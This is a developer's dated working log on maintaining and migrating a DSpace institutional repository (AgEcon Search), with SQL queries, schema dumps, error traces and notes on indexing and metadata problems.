:/dspace/dspace-ir_test/lib/activation.jar:/dspace/dspace-ir_test/lib/commons-cli.jar:/dspace/dspace-ir_test/lib/commons-codec-1.3.jar:/dspace/dspace-ir_test/lib/commons-collections.jar:/dspace/dspace-ir_test/lib/commons-dbcp.jar:/dspace/dspace-ir_test/lib/commons-fileupload.jar:/dspace/dspace-ir_test/lib/commons-io.jar:/dspace/dspace-ir_test/lib/commons-lang-2.1.jar:/dspace/dspace-ir_test/lib/commons-pool.jar:/dspace/dspace-ir_test/lib/fontbox.jar:/dspace/dspace-ir_test/lib/handle.jar:/dspace/dspace-ir_test/lib/jakarta-poi.jar:/dspace/dspace-ir_test/lib/jargon.jar:/dspace/dspace-ir_test/lib/jaxen.jar:/dspace/dspace-ir_test/lib/jdom.jar:/dspace/dspace-ir_test/lib/jena.jar:/dspace/dspace-ir_test/lib/jstl.jar:/dspace/dspace-ir_test/lib/log4j.jar:/dspace/dspace-ir_test/lib/lucene.jar:/dspace/dspace-ir_test/lib/lucene-sandbox.jar:/dspace/dspace-ir_test/lib/mail.jar:/dspace/dspace-ir_test/lib/mets.jar:/dspace/dspace-ir_test/lib/oaicat.jar:/dspace/dspace-ir_test/lib/oro.jar:/dspace/dspace-ir_test/lib/PDFBox.jar:/dspace/dspace-ir_test/lib/pg74.216.jdbc3.jar:/dspace/dspace-ir_test/lib/rome.jar:/dspace/dspace-ir_test/lib/serializer.jar:/dspace/dspace-ir_test/lib/servlet.jar:/dspace/dspace-ir_test/lib/standard.jar:/dspace/dspace-ir_test/lib/tm-extractors.jar:/dspace/dspace-ir_test/lib/xalan.jar:/dspace/dspace-ir_test/lib/xercesImpl.jar:/dspace/dspace-ir_test/lib/xml-apis.jar:/dspace/dspace-ir_test/config:/dspace/src/dspace-ir/build/classes/
########################################### 
Collection handle: 608
*********************************************
Handle 608
Bitstream ID 2287
Filter org.dspace.app.mediafilter.PDFFilter
Bitstream supports filter true
Bitstream name 200615.pdf.txt
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/pdfbox/util/PDFTextStripper
	at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:102)
	at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:159)
	at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:357)
	at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:311)
	at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:272)
	at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:211)


However the PDFTextStripper clas is there.


[silvi003@strip1 lib]$ jar -tvf PDFBox.jar | grep PDFTextStripper
13194 Thu Oct 12 12:19:36 CDT 2006 org/pdfbox/util/PDFTextStripper.class
3358 Thu Oct 12 12:19:38 CDT 2006 org/pdfbox/util/PDFTextStripperByArea.class
4382 Mon Jul 31 20:27:52 CDT 2006 Resources/PDFTextStripper.properties

January 14, 2011

Big SQL query to find handles where the pdf has not been indexed in DSPACE

The UDC DSPACE instance has a full text indexer. However there are many pdfs that have not been indexed. I wrote a SQL query to find these. Here it is
SELECT handle.handle, bitstream.name, bitstream.size_bytes  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle in 
((SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.name ~ '^.*pdf$')  EXCEPT (SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.name ~ '^.*pdf.txt$')) order by handle::text::integer;

This produces output like:

 handle |                                                               name                                                                | size_bytes 
--------+-----------------------------------------------------------------------------------------------------------------------------------+------------
 394    | Connect2006Fall.pdf                                                                                                               |    2146701
 394    | license.txt                                                                                                                       |       1400
 406    | m139.pdf                                                                                                                          |    1349983
 406    | license.txt                                                                                                                       |       1371
 406    | m139_Extras.zip                                                                                                                   |    2240787
 406    | m139meta.doc.txt                                                                                                                  |       2342
 406    | index.txt.txt                                                                                                                     |       1850
 422    | license.txt                                                                                                                       |       1371


Breaking it down the above expression:
SELECT handle.handle, bitstream.name, bitstream.size_bytes FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle in {THE HANDLES OF NON INDEXED PDF}
Next Step:
THE HANDLES OF NON INDEXED PDF = SELECT {HANDLES THAT HAVE A PDF} EXCEPT {HANDLES THAT HAVE A ARE INDEXED}

HANDLES THAT HAVE A PDF = SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.name ~ '^.*pdf$';

HANDLES THAT HAVE A PDF = SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.name ~ '^.*pdf.txt$';

December 20, 2010

AgEcon handle 93411 messed up ... reingest

The handle 93411 had no uri metadata and Louise could not open it in an agecon browser window. Here is a message that I sent to Louise

Louise, I have spent some time on this problem. It turns out that 93411 has no uri entry. I fixed this, but the item would not appear in DSPACE. I then found that it was not in any collection. I also fixed this but was again unable to display the item. Something is deeply sick with this item. I have extracted all the meta data and the pdf. I suggest that you reingest it into DSPACE. When you are done I will delete the 93411.

Jeff


Here are the files that I sent her.

The metadata fields for 93411 in an excel file

A pdf of the asset for 93411

Some SQL along the way:

Find the metadata_field_id

select metadata_field_id text_value from handle, metadatavalue where metadatavalue.item_id=handle.resource_id AND handle=93411;

The value for this is: 46277




Insert a uri and a community:

INSERT INTO metadatavalue (item_id , metadata_field_id , text_value , text_lang , place) VALUES (46277,25,'http://purl.umn.edu/93411',' ', 1);

INSERT INTO communities2item (community_id , item_id) VALUES (312,46277);

THese failed to make 93411 visible.

Find the bitstream.

select bitstream.bitstream_id from handle,item2bundle,bundle2bitstream,bitstream where handle.resource_id=item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id=bitstream.bitstream_id AND handle= 93411;

Here is a weird bitstream that I found. The pdf above is a rename of this weird bitstream.


bitstream_id | bitstream_format_id | name | size_bytes | checksum | checksum_algorithm | description | user_format_description | source | internal_id | deleted | store_number | sequence_id
--------------+---------------------+----------------+------------+----------------------------------+--------------------+-------------+-------------------------+--------------------------------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
62283 | 3 | aar11.12-g.pdf | 350991 | a8f946880c52a2ca33ebd8a3992bfdc3 | MD5 | | | /dspace/assetstore/dspace-sr/upload/d:\我的文档\上传文件\十一十二上传\aar11.12-g.pdf | 102022284912009077416587006709868722823 | f | 0 | 2

December 8, 2010

SQL to find handles that correspond to a specific language.iso in DSPACE

select handle,metadatavalue.text_value from handle, item, metadatavalue where metadatavalue.item_id=handle.resource_id AND metadata_field_id = 38 AND handle.resource_type_id=2 AND text_value='French' AND handle.resource_id=item.item_id AND item.withdrawn='f';

November 24, 2010

Documentation of php code to query DSPACE DB

Code Purpose Documentation complete
port_meta_field_uniq_count.php Get a count of the unique
values for a field (metadata_id)
yes
port_file_handles_to_meta.php Take a file of DSPACE handles and dump
the associated metadata to an excel file
yes
port_DSPACE_sql.inc.php Set of utility functions no
port_metadata_id_to_full_table.php Finds all the metadata associated with non null
values of a metadata id e.g dc.subject.mesh has a metadat_id of 62
./port_metadata_id_to_full_table.php 62
will make an excel spreadsheet of all the
metadata where dc.subject.mesh
is not null
yes
port_metadata_count.php Gives a count of occurrences of a metadata text field
yes
port_sql_column_diff.php Does a diff between two SQL columns no

November 18, 2010

DSPACE sql for items that have not been withdrawn

The line below will do a search for dc.type (metadata_field_id=66) for items that have not been withdrawn.
select handle from handle, metadatavalue, item where metadata_field_id=66 AND metadatavalue.item_id=handle.resource_id AND text_value='Other' AND resource_id=item.item_id AND withdrawn='f';

mime types in AgEcon

Overview

I have found that the metadata type:
dc.format.mimetype (metadata_field_id = 36)
THe field dc.format.mimetype only contains entries for items from before the migration to DSPACE. In general, we will need to use the Format field from the bitstream table. This is valid for both before and after the migration.

dc.format.mimetype

The little shell script below pulls the handles of items that have non-null values for dc.format.mimetype.
query="select handle from metadatavalue,handle where metadata_field_id=36 AND item_id=handle.resource_id AND handle.resource_type_id=2;"
echo $query > temp_sql_file
psql -U dspace_sr  dspace_sr  < temp_sql_file
rm temp_sql_file
This shell script pulls all item handles.
query="select  handle  from handle where handle.resource_type_id=2;"
echo $query > temp_sql_file
psql -U dspace_sr  dspace_sr  < temp_sql_file
rm temp_sql_file
With these two scripts, I was able to find the handles that did and did not have the dc.format.mimetype field populated.

Comparison of metadata pre and post migration to DSPACE

Here is a comparison of pre vs post migration to DSPACE and the metadata fields related to mimetype.
DSPACE Table Element Present on Pre-Migration
(example handle 36676)
Present on Post- Migration
(example handle 96677)
dc.format.mimetype yes no
Bitstream.name yes yes
Bitstream.source no yes
Bitstream.description no yes
Bitstream.format yes yes
Bitstream.user format description no no
Bitstream.license no yes
The information for the table above came largely from the bitstream table.

Bitstream table for handle 96677:
Bitstream table for handle 96677 Bitstream table for handle 36676:
Old_bitstream_ 36676.tiff

Summary of Bitstream.format

I have found the unique mime types in AgEcon using the bitstream.format field:
application/pdf 45264
application/octet-stream 1
application/vnd.ms-excel 2
The handles for the non-pdf files are:
application/octet-stream
62242
application/vnd.ms-excel
42187
92231
This field will be used to determine mime type.

November 8, 2010

mismatch between handle table and collection/community tables

Problem: some collection and community handles are in the handle table but are not found in the collection/community tables

1) If you put this handle into the agecon system you get:
Invalid Identifier

The identifier /59677 does not correspond to a valid Object in AgEcon Search. This may be because of one of the following reasons:

    * The URL of the current page is incorrect - if you followed a link from outside of AgEcon Search it may be mistyped or corrupt.
    * You entered an invalid ID into a form - please try again.

If you're having problems, or you expected the ID to work, feel free to contact the site administrators.
2) The handles do exist in the purl system.
I call collections of this type "zombie" collections/communities. 3) Before we migrate to Islandora, we need to find all the zombie collections/communities and make sure that they are not transferred into the new system and that they are tombstoned in the purl system.

Locating all the troublesome handles

I wrote some small php code that found a vector of handles for items, collections or communities from the handle table and then diffed this vector with one from the item, collection or community table. Below are the results.

Items

query1 SELECT handle FROM handle, item  WHERE handle.resource_type_id=2 AND handle.resource_id=item.item_id
query2 SELECT handle FROM handle WHERE resource_type_id=2
Length query 1 item_id 42838
Length query 2 42838
Length diff array 0

Collections

Array
(
    [39] => 33702
    [47] => 33718
    [48] => 33720
    [50] => 33724
    [51] => 33726
    [63] => 33750
    [70] => 33764
    [71] => 33766
    [72] => 33768
    [81] => 33786
    [82] => 33788
    [101] => 33826
    [111] => 33846
    [126] => 33876
    [127] => 33878
    [128] => 33880
    [149] => 33922
    [158] => 33940
    [159] => 33942
    [171] => 33966
    [183] => 33990
    [187] => 33998
    [192] => 34008
    [201] => 34026
    [202] => 34028
    [234] => 34092
    [237] => 34098
    [302] => 34228
    [312] => 34248
    [319] => 34262
    [322] => 34268
    [325] => 34274
    [328] => 34280
    [329] => 34282
    [330] => 34284
    [331] => 34286
    [332] => 34288
    [333] => 34289
    [334] => 34290
    [335] => 34291
    [336] => 34293
    [337] => 34295
    [338] => 34297
    [339] => 34299
    [340] => 34301
    [341] => 34303
    [342] => 34305
    [343] => 34307
    [344] => 34309
    [345] => 34311
    [346] => 34313
    [347] => 34315
    [348] => 34317
    [349] => 34319
    [350] => 34321
    [351] => 34323
    [359] => 34340
    [360] => 34342
    [362] => 34344
    [363] => 34346
    [364] => 34348
    [365] => 34350
    [368] => 34356
    [699] => 35008
    [718] => 35046
    [851] => 35312
    [868] => 35346
    [1123] => 35857
    [1322] => 36453
    [1323] => 36456
    [1324] => 36459
    [1325] => 36462
    [1333] => 36486
    [1361] => 36570
    [1365] => 36582
    [1371] => 36600
    [1373] => 36606
    [1383] => 36636
    [1405] => 36998
    [1435] => 37168
    [1436] => 37170
    [1451] => 37295
    [1459] => 37584
    [1460] => 37586
    [1483] => 37939
    [1484] => 37940
    [1485] => 37942
    [1486] => 37947
    [1490] => 37968
    [1502] => 42438
    [1519] => 42893
    [1560] => 43992
    [1562] => 44080
    [1584] => 44940
    [1602] => 45639
    [1621] => 46044
    [1623] => 46046
    [1638] => 46277
    [1643] => 46321
    [1645] => 46501
    [1646] => 46502
    [1685] => 47047
    [1753] => 47495
    [1766] => 47829
    [1771] => 48118
    [1784] => 48250
    [1812] => 49828
    [1814] => 49831
    [1822] => 50343
    [1836] => 51324
    [1845] => 52117
    [1849] => 52237
    [1860] => 53120
    [1865] => 53221
    [1867] => 53245
    [1868] => 53287
    [1877] => 53371
    [1887] => 53406
    [1921] => 53652
    [1953] => 54541
    [1973] => 55664
    [2070] => 56401
    [2139] => 58795
    [2140] => 58798
    [2216] => 59649
    [2239] => 59672
    [2241] => 59676
    [2242] => 59677
    [2305] => 91208
    [2411] => 94371
)
query1 SELECT handle FROM handle, collection  WHERE handle.resource_type_id=3 AND handle.resource_id=collection.collection_id
query2 SELECT handle FROM handle WHERE resource_type_id=3
Length query 1 item_id 2295
Length query 2 2425
Length diff array 130
[silvi003@strip1 bin]$ 

Communities


Array
(
    [5] => 35871
    [11] => 35889
    [12] => 35892
    [14] => 35900
    [15] => 35903
    [16] => 35906
    [17] => 35909
    [258] => 36632
    [259] => 36635
    [285] => 37192
    [301] => 37938
    [302] => 37941
    [315] => 42934
    [327] => 43991
    [349] => 47494
    [369] => 53119
    [375] => 53468
    [382] => 56201
    [394] => 60659
    [407] => 93689
)
query1 SELECT handle FROM handle, community  WHERE handle.resource_type_id=4 AND handle.resource_id=community.community_id
query2 SELECT handle FROM handle WHERE resource_type_id=4
Length query 1 item_id 397
Length query 2 417
Length diff array 20

mismatch between handle table and collection/community tables

query1 SELECT handle FROM handle, item  WHERE handle.resource_type_id=2 AND handle.resource_id=item.item_id
query2 SELECT handle FROM handle WHERE resource_type_id=2
Length query 1 item_id 42838
Length query 2 42838
Length diff array 0

Going from handles to metadata text value in Dspace

Handles that are items

DSPACE tables that map item handles to meta data text

The pdf below shows how the handle table connects to the metadata table for items. Item Handle to MetaData.pdf

sql to pull metadata for items

The query will pull all the metadata for handle value 30308 that is an item (resource_type_id=2).
select text_value from handle, metadatavalue where metadatavalue.item_id=handle.resource_id AND handle.resource_type_id=2 AND handle=30308;

Handles that are collections

DSPACE tables that map collection handles to meta data text

The pdf below shows how the handle table connects to the metadata table for items. Note for this to work we need to go through the collection table.
Collection Handle to MetaData.pdf

sql to pull metadata for collections

THe query below willpull all of the metadata associated with the collection that has a handle of 37244.
select text_value from handle, collection, metadatavalue where metadatavalue.item_id=collection.template_item_id AND collection.collection_id=handle.resource_id AND handle.resource_type_id=3 AND handle=37244;

Handles that are communities

It looks like the communities do not map to meta data fields. The diagram below shows the connection between the handle and the community table, but I do not see how to link to the metadatavalue table.
Community Handle to MetaData.pdf

October 21, 2010

SQL to find DSPACE collection info given item handle

Collection name

Collection name for item handle 94921

SELECT collection.name FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND handle = 94921 ;

Collection handle

Collection handle for item handle 94921

SELECT handle FROM handle WHERE resource_type_id=3 AND resource_id=(SELECT collection.collection_id FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND handle = 94921) ;

October 12, 2010

examples of provenance field in DSPACE

When we move from DSPACE to drupal/fedora we will need
 handle 	                            Provenance
36676	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36675	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36674	 Made available in DSpace on 2007-03-07T16:00:37Z (GMT). No. of bitstreams: 1 sp02fe01.pdf: 51451 bytes, checksum: 6731d24ea9ea1130f75f334af1254c47 (MD5)   Previous issue date: 2002
36673	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36672	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36671	 Made available in DSpace on 2007-03-07T16:00:39Z (GMT). No. of bitstreams: 1 sp02in01.pdf: 38798 bytes, checksum: c50744342b737b0150f9e7daba133471 (MD5)   Previous issue date: 2002
36670	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36669	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36668	 Made available in DSpace on 2007-03-07T16:00:40Z (GMT). No. of bitstreams: 1 sp02cl01.pdf: 220515 bytes, checksum: fc81cbb5e1d3ff157bc1ec8ee07142b1 (MD5)   Previous issue date: 2002
36667	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36666	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36665	 Made available in DSpace on 2007-03-07T16:00:41Z (GMT). No. of bitstreams: 1 sp02de01.pdf: 43516 bytes, checksum: b2c54432266049e04b14a9e5e6a4c6df (MD5)   Previous issue date: 2002
36664	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36663	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36662	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02fl01.pdf: 89644 bytes, checksum: 4c353f2db94dde10910d36d3610ac68e (MD5)   Previous issue date: 2002
36661	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36660	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36659	 Made available in DSpace on 2007-03-07T16:00:42Z (GMT). No. of bitstreams: 1 sp02ba02.pdf: 149756 bytes, checksum: eb35a6d44da3a3645a71315c46c419bf (MD5)   Previous issue date: 2002
36658	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36657	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36656	 Made available in DSpace on 2007-03-07T16:00:43Z (GMT). No. of bitstreams: 1 sp02up01.pdf: 542678 bytes, checksum: a06c46cbfda686890c712bf5de083026 (MD5)   Previous issue date: 2002
36655	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36654	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36653	 Made available in DSpace on 2007-03-07T16:00:44Z (GMT). No. of bitstreams: 1 sp02ho01.pdf: 149243 bytes, checksum: 2db5cfebc10b0cd148ce1e06e2149851 (MD5)   Previous issue date: 2002
36652	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36651	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36650	 Made available in DSpace on 2007-03-07T16:00:45Z (GMT). No. of bitstreams: 1 sp02va01.pdf: 102387 bytes, checksum: cb7f7c54b0b7713a7e8df1ee749db762 (MD5)   Previous issue date: 2002
36649	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002
36648	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002
36647	 Made available in DSpace on 2007-03-07T16:00:46Z (GMT). No. of bitstreams: 1 sp02sh01.pdf: 188489 bytes, checksum: bff2872ec0b4de423a55bc5684796153 (MD5)   Previous issue date: 2002

provenance.xls

September 1, 2010

Distinct values for language in AgEcon

Type of language metadata fields in DSPACE

 metadata_field_id | metadata_schema_id |   element   |         qualifier         
-------------------+--------------------+-------------+---------------------------
                37 |                  1 | language    | 
                38 |                  1 | language    | iso

language field (metadata_field_id = 37)

Total count:
sql: select count( text_value) from metadatavalue where metadata_field_id=37;
Count: 27538

Distinct values
sql: select DISTINCT text_value from metadatavalue where metadata_field_id=37 ;

Afrikaans
Chinese
Danish
Dutch
English
French
German
Hungarian
Japanese
Spanish
(10 rows)

language iso field (metadata_field_id = 38)

Total count:
sql: select count( text_value) from metadatavalue where metadata_field_id=38;
Count: 41971
select DISTINCT text_value from metadatavalue where metadata_field_id=38 ;
af
da
de
Dutch
en
en_US
es
fr
French
it
nl
other
sp
SP
Spanish
zh
(16 rows)
Clearly some non-iso values have slipped in.

July 15, 2010

Excel files to be derived from dspace to go into Drupal

We are going to extract the guts from dspace and put it into Drupal here are the various excel spreadsheets that must be created.
parent_id 
0 - no parent
1 - collection
2 - community


items
metadata 1  ... metadata n parent_type parent_id

communities

     Column       |          Type          | Modifiers 
-------------------+------------------------+-----------
 community_id      | integer                | not null
 name              | character varying(128) | 
 short_description | character varying(512) | 
 introductory_text | text                   | 
 logo_bitstream_id | integer                | 
 copyright_text    | text                   | 
 side_bar_text     | text                   |    <---- Blank

Excel community file
community_id name short_description introductory_text parent_type parent_id has_child


collections:


                  Table "public.collection"
         Column         |          Type          | Modifiers 
------------------------+------------------------+-----------
 collection_id          | integer                | not null
 name                   | character varying(128) | 
 short_description      | character varying(512) | 
 introductory_text      | text                   | 
 logo_bitstream_id      | integer                | 
 template_item_id       | integer                |   <--- not all filled
 provenance_description | text                   |   <--- blank
 license                | text                   | 
 copyright_text         | text                   | 
 side_bar_text          | text                   | 
 workflow_step_1        | integer                | <--- not all filled
 workflow_step_2        | integer                | <--- not all filled
 workflow_step_3        | integer                | 
 submitter              | integer                | <--- eperson_group_id
 admin                  | integer                | <--- eperson_group_id

Excel collection file
collection_id name short_description introductory_text parent_type submitter_group_id admin_group_id parent_id has_child




dspace_ir=> \d eperson;
                    Table "public.eperson"
       Column        |            Type             | Modifiers 
---------------------+-----------------------------+-----------
 eperson_id          | integer                     | not null
 email               | character varying(64)       | 
 password            | character varying(64)       | 
 firstname           | character varying(64)       | 
 lastname            | character varying(64)       | 
 can_log_in          | boolean                     |  <-- all of these are true
 require_certificate | boolean                     |  <-- all of these are false
 self_registered     | boolean                     |  <-- blanks and false
 last_active         | timestamp without time zone | 
 sub_frequency       | integer                     |  <-- blank
 phone               | character varying(32)       | 
 netid               | character varying(64)       | 



dspace_ir=> \d epersongroup;
      Column      |          Type          | Modifiers 
------------------+------------------------+-----------
 eperson_group_id | integer                | not null    <-- admin or submitter
 name             | character varying(256) | 

dspace_ir=> \d epersongroup2eperson;
  Table "public.epersongroup2eperson"
      Column      |  Type   | Modifiers 
------------------+---------+-----------
 id               | integer | not null
 eperson_group_id | integer | 
 eperson_id       | integer | 


dspace_ir=> select * from  epersongroup2workspaceitem ;
 id | eperson_group_id | workspace_item_id 
----+------------------+-------------------
(0 rows)



3 excel tables
eperson
eperson_id firstname lastname phone netid

group 
eperson_group_id name

eperson2group
eperson_group_id eperson_id

July 14, 2010

List of bitstream_format_id and mimetypes for DSPACE


 bitstream_format_id |           mimetype            |  short_description   |                             description                              | support_level | internal 
---------------------+-------------------------------+----------------------+----------------------------------------------------------------------+---------------+----------
                   1 | application/octet-stream      | Unknown              | Unknown data format                                                  |             0 | f
                   2 | text/plain                    | License              | Item-specific license agreed upon to submission                      |             1 | t
                   3 | application/pdf               | PDF                  | Adobe Portable Document Format                                       |             1 | f
                   4 | text/xml                      | XML                  | Extensible Markup Language                                           |             1 | f
                   5 | text/plain                    | Text                 | Plain Text                                                           |             1 | f
                   6 | text/html                     | HTML                 | Hypertext Markup Language                                            |             1 | f
                   7 | text/css                      | CSS                  | Cascading Style Sheets                                               |             1 | f
                   8 | application/msword            | Microsoft Word       | Microsoft Word                                                       |             1 | f
                   9 | application/vnd.ms-powerpoint | Microsoft Powerpoint | Microsoft Powerpoint                                                 |             1 | f
                  10 | application/vnd.ms-excel      | Microsoft Excel      | Microsoft Excel                                                      |             1 | f
                  11 | application/marc              | MARC                 | Machine-Readable Cataloging records                                  |             1 | f
                  12 | image/jpeg                    | JPEG                 | Joint Photographic Experts Group/JPEG File Interchange Format (JFIF) |             1 | f
                  13 | image/gif                     | GIF                  | Graphics Interchange Format                                          |             1 | f
                  14 | image/png                     | image/png            | Portable Network Graphics                                            |             1 | f
                  15 | image/tiff                    | TIFF                 | Tag Image File Format                                                |             1 | f
                  16 | audio/x-aiff                  | AIFF                 | Audio Interchange File Format                                        |             1 | f
                  17 | audio/basic                   | audio/basic          | Basic Audio                                                          |             1 | f
                  18 | audio/x-wav                   | WAV                  | Broadcase Wave Format                                                |             1 | f
                  19 | video/mpeg                    | MPEG                 | Moving Picture Experts Group                                         |             1 | f
                  20 | text/richtext                 | RTF                  | Rich Text Format                                                     |             1 | f
                  21 | application/vnd.visio         | Microsoft Visio      | Microsoft Visio                                                      |             1 | f
                  22 | application/x-filemaker       | FMP3                 | Filemaker Pro                                                        |             1 | f
                  23 | image/x-ms-bmp                | BMP                  | Microsoft Windows bitmap                                             |             1 | f
                  24 | application/x-photoshop       | Photoshop            | Photoshop                                                            |             1 | f
                  25 | application/postscript        | Postscript           | Postscript Files                                                     |             1 | f
                  26 | video/quicktime               | Video Quicktime      | Video Quicktime                                                      |             1 | f
                  27 | audio/x-mpeg                  | MPEG Audio           | MPEG Audio                                                           |             1 | f
                  28 | application/vnd.ms-project    | Microsoft Project    | Microsoft Project                                                    |             1 | f
                  29 | application/mathematica       | Mathematica          | Mathematica Notebook                                                 |             1 | f
                  30 | application/x-latex           | LateX                | LaTeX document                                                       |             1 | f
                  31 | application/x-tex             | TeX                  | Tex/LateX document                                                   |             1 | f
                  32 | application/x-dvi             | TeX dvi              | TeX dvi format                                                       |             1 | f
                  33 | application/sgml              | SGML                 | SGML application (RFC 1874)                                          |             1 | f
                  34 | application/wordperfect5.1    | WordPerfect          | WordPerfect 5.1 document                                             |             1 | f
                  35 | audio/x-pn-realaudio          | RealAudio            | RealAudio file                                                       |             1 | f
                  36 | image/x-photo-cd              | Photo CD             | Kodak Photo CD image                                                 |             1 | f
                  37 | text/plain                    | tfw                  | ArcView World File For TIF Image                                     |             0 | f
                  38 | text/plain                    | e00                  | ArcInfo Coverage Export                                              |             0 | f
(38 rows)

Work around for problem with PDF box text extraction

The problem

When PDFbox was used to extract text from a file of size ~20 meg, it would chew up more and more of the memory and eventually drag the system down to a stand still.

The workaround

I used the methods setStartPage and setEndPage in the PDFTextStripper class to limit the number of pages converted to text at a time.

Results of a run

Extracting text
NumberPagesInPDF 1959
s Extraction time seconds 230
Page per second s
Number of characters extracted 672324
For the number of pages per text extraction I tried 20, 50 and 100 pages and the results were similar. This rate seems very slow.

Specs on computer used

The run above was done on odin.lib.umn.edu. Here is some information on it:

cat /proc/cpuinfo
processor : 0
